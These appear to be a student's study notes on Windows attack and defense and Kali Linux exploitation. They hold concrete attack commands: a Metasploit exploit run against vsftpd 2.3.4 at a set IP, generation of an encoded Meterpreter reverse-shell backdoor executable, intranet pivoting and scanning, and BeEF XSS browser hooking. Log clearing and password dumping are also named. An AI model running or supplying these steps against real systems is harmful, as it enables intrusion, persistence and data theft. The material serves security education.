a. Study of Chapter 7 of the textbook "Network Attack and Defense Technology"
第七章Windouws操作系统安全攻防的内容进行学习。Windouws是目前市场上占统治地位的操作系统,到2010年,已经占据了百分之八十八的市场份额。基本结构分为运行于处理器特权模式的操作系统内核,已经运行在处理器非特权模式的用户空间代码,与UNIX一样,采用宏内核模式来进行架构,这也使得系统更容易遭受Rootkit的危害,为了应对这种攻击,采用数字签名的办法提高安全性。Windows操作系统中,有用户,用户组和计算机三大类,对于每个安全主体,空间和时间上都全局唯一的SID安全标识符来进行标识.对于Windows,远程攻击技术分为:远程口令猜测与破解攻击,攻击Windows网络服务,攻击Windows客户端及用户这三大类。Windows通过基于服务器消息块协议承载的文件与打印共享服务来为网络用户提供远程访问文件系统的和打印机的支持,所以SMB协议也成为了攻击者实施远程口令字猜测的攻击渠道,目前自动执行远程口令字猜测的工具有很多,其中比较流行的包括legin,enum,NTSscan等。攻击者在目标系统上达到自己的需求和目的后,一般还会在系统中植入远程控制系统,维持对这台主机的控制权,比如一些命令行远程控制工具Netcat,或者图形化远程控制工具,其中最著名的是VNC软件。
Basic Framework of Windows Operating System
1、windows基本结构分为运行于处理器特权模式的操作系统内核以及运行在处理器非特权模式的用户,即为内核态和用户态。2、内核态:windows执行体、windows内核体、设备驱动程序、硬件抽象层、windows窗口与图形界面接口。3、用户态:系统支持进程、环境子系统服务进程、服务进程、用户应用软件、核心子系统DLL。 4、核心机制:进程和线程管理机制、内存管理机制、文件管理机制、注册表管理机制、网络管理机制。5、网络管理机制:网卡硬件驱动程序(物理层)、NDIS库以及miniport驱动程序(链路层)、TDI传输层(网络协议驱动)(网络层和传输层)、网络APID以及TDI客户端(会话层和表示层)、网络应用程序和服务进程(应用层).
Security Architecture and Mechanisms
1、监控器模型:主体到客体的访问都通过监控器作中间,由引用监控器根据安全访问控制策略来进行授权访问,所有访问记录都由监控器生成审计日志。2、核心:SRM安全引用监控(内核中)、LSASS安全服务(用户态)、winlogon/netlogn、以及Eventlog 3、身份认证机制:安全主体:用户、用户组、计算机 身份认证:本地身份认证(winlogon进程、GINA图形化登录窗口与LSASS服务)、网络身份认证(NTLM、Lanman、kerberos) 4、授权与访问控制机制:对象:文件,目录,注册表键值,内核对象,同步对象,私有对象,管道,内存,通信接口。 属性组成:Owner SID,Group SID,DACL自主访问控制列表,SACL系统审计访问控制列表。 5、安全审计机制 6、其他安全机制:安全中心(防火墙、补丁自动更新、病毒防护),IPsec加载和验证机制,EPS加密文件系统,windows文件保护机制,捆绑的IE浏览器所提供的隐私保护和浏览器安全保护机制。
Remote security attack and defense technology
1、包括远程口令猜解攻击、windows网络服务攻击,windows客户端和用户攻击。2、生命周期:windows安全漏洞发现,利用与修补过程 安全漏洞公开披露信息 CVE,NVD,SecyrityFocus,OSVDB 针对特定目标的渗透测试攻击过程:漏洞扫描测试、查找针对发现漏洞的渗透代码、实施渗透测试 使用metasploit软件实施渗透测试:用户接口(CLI、Console,web,GUI) 3、远程口令猜解攻击: 远程口令猜解:SMB协议(tcp445、tcp139),其他包括WMI服务、TS远程桌面终端服务,MY SQL数据库服务、SharePoint。工具包括:Legion、enum、smbgrind、NTScan、XScan、流光 远程口令字交换通信窃听与破解:NTLM、Lanman、NTLMV2和kerberos网络认证协议的弱点。 远程口令猜解的防范:关闭不必要的易受攻击的网络服务、配置主机防火墙来限制某些端口服务、网络防火墙限制这些服务的访问、禁用过时且有安全缺陷的Lanman和NTLM、指定强口令策略。4、网络服务远程渗透攻击:针对NETBIOS服务的著名漏洞和攻击、针对SMB服务的著名漏洞和攻击、针对MSRPC服务的著名漏洞和攻击、针对windows系统上微软网络的远程渗透攻击、针对windows系统上第三方服务的远程渗透攻击。 防范措施:最基本的是尽量避免与消除这些渗透攻击所依赖的服务软件安全漏洞。
Local security attack and defense technology
1、本地提权攻击:利用操作系统内核、特权用户启动程序中安全缺陷与漏洞,原因是服务器和桌面系统没有即时进行补丁更新。2、敏感信息窃取: windows系统口令密文提取技术(拷贝口令密文文件、rdisk工具备份、pwdumpx从SAM文件或者活动目录中提取口令密文) windows系统口令字破解技术(L0phtCrack、John theRipperCain) 用户敏感数据窃取:find、findstr、grep、meterpreter 本地敏感信息窃取防范:选择高强度、高防御的口令,使用更安全的加密明文算法,安全配置策略。
windows kill trail
1、消灭踪迹:关闭审计功能、清理事件日志。 防范措施:事先设置系统审计和网络服务审计,日志记录在不可擦除的CDROM上。 2、远控和后门程序: 远控:命令行远控工具(Netcat,psexec,meterpreter),图形化远控工具(VNC,RemoteAdmin,PCanyware) 后门程序:国外(BO、BO2K),国内(冰河、灰鸽子、广外女生、PCshare、磁碟机、机器狗等) 防范措施:后门检测软件、杀软、rootkitrerealer、IcSword。
b. Video learning
1. Retrieval and utilization of Kali exploits
1. searchsploit can use keywords to search for vulnerability information and the corresponding exp of the vulnerability to searchsploit wordpress
list the vulnerabilities and file addresses
to view the listed files, for example:
2. ikat automatically opens different exp. Waiting for the target to visit.
3. termineter aims to assess the security of smart meters
2. The Metasploit Foundation of Kali Vulnerability Exploitation
Metasploit is often used in penetration testing. This software includes many tools that form a complete attack framework.
1. Start the service To use Metasploit
in Kali, you need to start the PostgreSQL database service and the metasploit service first, and then you can use the msf database to query exploits and records. 2. Path introduction The path of msf in Kali is /usr/share/metasploit-framework 3. The basic command msfpayload: used to generate payload or shellcode. Searches can be used to query; the -o option can list the parameters required by the payload. msfencode: The encoder in msf, which was used to bypass AV (antivirus software) in the early days, and is now commonly used to encode msfpayload with it to avoid bad strings of exploits. msfconsole: Open the console of metasploit. Enter msfconsole to open msf
msfpayload -l |gre[ "windows"
4. Test example: find vulnerabilities, search for exploit and nmap -sV 222.28.136.171
you can see that the ftp service is open on port 21. The version used is vsftpd 2.3.4. Is there a vulnerability in this version? Search
in msf to find a matchsearch vsftpd
5. Test example: select exploit to view parameters
There was a small problem when entering the exploit. After checking, I found that I made an input error. After correcting it, I entered the
viewing parameters correctly. I found that the parameters of RHOST have not been set, and then set the parameters for it.set RHOST 222.28.136.171
6. Test example: select payload
After setting, show optionscheck the parameters and find that there are no parameters to set.
8. The attack test can be performed by executing the attack
input exploit. If successful, a shell will be returned:
At this point, you can view the id, ip address, and some file information, etc., to obtain the permissions of the target host
3. Introduction to Meterpreter for Kali Vulnerability Exploitation
Generate Meterpreter backdoor; open MSF, enable monitoring (select exploit/multi/handler); execute door.exe on the target machine; set the LHOST and LPORT parameters of reverse_tcp msfpayload windows/meterpreter/reverse_tcp LHOST=222.28.136.234 LPORT=2333 R | msfencode -t exe -c 5 > /root/door.exe /* 查看自己的IP地址为222.28.136.234,LHOST、LPORT为reverse_tcp的参数,可以在msf里查看到(记得把服务启动)*/
touse exploit/multi/handler receive the returned connection
At this point, the command to generate the backdoor is executed 
to generate the door.exe file
4. Metasploit post-penetration testing of Kali exploits
After the springboard obtains a certain authority, it needs to actively develop the authority of the intranet host, obtain the specified target information, and probe for system vulnerabilities. With the help of the Meterpreter backdoor that msf has obtained, the series of operations can be easier.
1. View the current network card and network segment information (using ifconfig). You can see three network cards, one is the local network card, the other is the network card we can access, and the other network card has an internal network IP (can not access, you can try ping below).
2. Adding routing tables run autoroute -s 10.0.0.1can use the modules in msf to attack or scan across network segments. Quickly added via script autoroute.
3. Open socket proxy, create a socks proxy by using auxiliary/server/socks4a module, which can be used for browser, sqlmap, nmap. You can access intranet computers through a proxy.
4. You can freely switch to the session through background and session -i.
5. Enter run to see many commands that can be done on the meterpreter.
6. You can see the post-penetration test module through run post/.
7. Obtain intranet information. run arp_scanner -r 10.0.0.1/24
8. You can also upload files and perform port forwarding for subsequent testing, such as upload lcx.exe c:\\transferring files to the root directory of the c drive.
5. BeeF exploited by Kali
1. Start BeeF on the command line beef-xss
2. Suppose the host under test requests to http://127.0.0.1:3000/demos/basic.html due to the XSS vulnerability. 
At this time, there will be an online host on the left side of the page: 
here , the input is hello world, the following returns success!
5. Proxy function (proxy function)
Select the target host, right-click, and select Use as Proxy in the menu; then edit and send the content you want to send in Forge Request in the Rider tab.
6. BeEF does not load Metasploit by default. If you want to use Metasploit's rich attack modules, you need to do some configuration.
Default: 
Configuration:
First open the beef xss directory
cd /usr/share/beef-xss/
ls
nano config.yaml /* 编辑一下,可以看到有很多配置信息,包括用户名、密码都可以在这设置,在此将Metasploit的false修改为true */
clear
Make sure that the IP and other information here are set correctly (127.0.0.1 is not applicable, you need to use the local IP), and modify the Custom path:
cd extensions/metasploit/
ls
nano config.yaml /* 将host和callback_host行的IP修改为本机IP,并修改custom路径为/usr/share/metasploit-framework/ */After configuration, open msfconsole and run the command:
load msgrpc ServerHost=222.28.136.234 Pass=abc123
After ./beef -x
the exploit module of reloading Metasploit is 
loaded, restart the service
service beef-xss restart
At this time, visit the following previous pages again, and find that you cannot connect. Wait for a while and log in with the default user password. I found that there are many more modules under Metasploit: